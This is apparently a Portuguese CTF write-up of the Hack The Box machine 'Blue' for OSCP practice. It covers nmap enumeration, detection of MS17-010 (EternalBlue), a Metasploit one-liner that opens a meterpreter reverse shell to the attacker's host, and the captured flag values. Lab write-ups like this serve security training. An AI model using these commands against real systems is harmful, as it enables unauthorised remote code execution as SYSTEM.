OSCP Prep — TJNull HTB — 4 -Blue Write-up
Máquina bem simples, pois utiliza um dos mais famosos exploit de windows que foi eternizado no wannacry.
Lembrando que pelo relatório para a prova do OSCP inicia-se no item 3 a parte de methodologies e informações da maquina e sistemas. Iniciaremos o Write-up direto da enumeração pelo item 3.2.1
Por se tratar de uma maquina aposentada (retired) do HTB o IP muda cada vez que ela é ligada, para este artigo o IP é: 10.129.137.149
- Nmap Scan Results:
nmap -n -T5 -A — top-ports 10000 -oN 1-nmapTudao.txt 10.129.137.149
3.2.2 Identify and analysis possibles vulnerability
Após a identificação dos serviços, foram realizadas pesquisas sobre os serviço smb e rpc, para isso foi exeutado o script de vulnerabilidade do nmap:
nmap -n -T4 -p445 — script vuln 10.129.137.149
E foi constatado a vulnerabilidade a ms17–010, conhecido como eternalblue:
- Vulnerability Explanation and POC:
A vulnerabilidade do ms17–010 eternalblue permite uma exploração através do serviço de compartilhamento do windows na porta 445 permitindo RCE, então o ataque consiste em executar um payload que possibilite um reverseshell com privilégios de administrador do sistema..
3.2.3 Gain Access
- Getting Low-Privilege shell:
Para obter acesso foi utilizado um módulo do msfconsole para exploração do ms17–010
Foi escolhido a opção 0, então para executar foi utilizado o seguinte comando:
msfconsole -x ‘use windows/smb/ms17_010_eternalblue; set RHOSTS 10.129.137.149; set payload; windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4444; run;’
Acesso com authority system
Com usuário authority foi obtida a flag do usuário e do root nos seguintes endereços
‘C:\Documents and Settings\john\Desktop\user.txt’
type C:\Users\haris\Desktop\user.txt
C:\DocumentsandSettings\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
Proof Screenshot Here:
— user.txt Contents:
4c546aea7dbee75cbd71de245c8deea9
— root.txt Contents:
ff548eb71e920ff6c08843ce9df4e717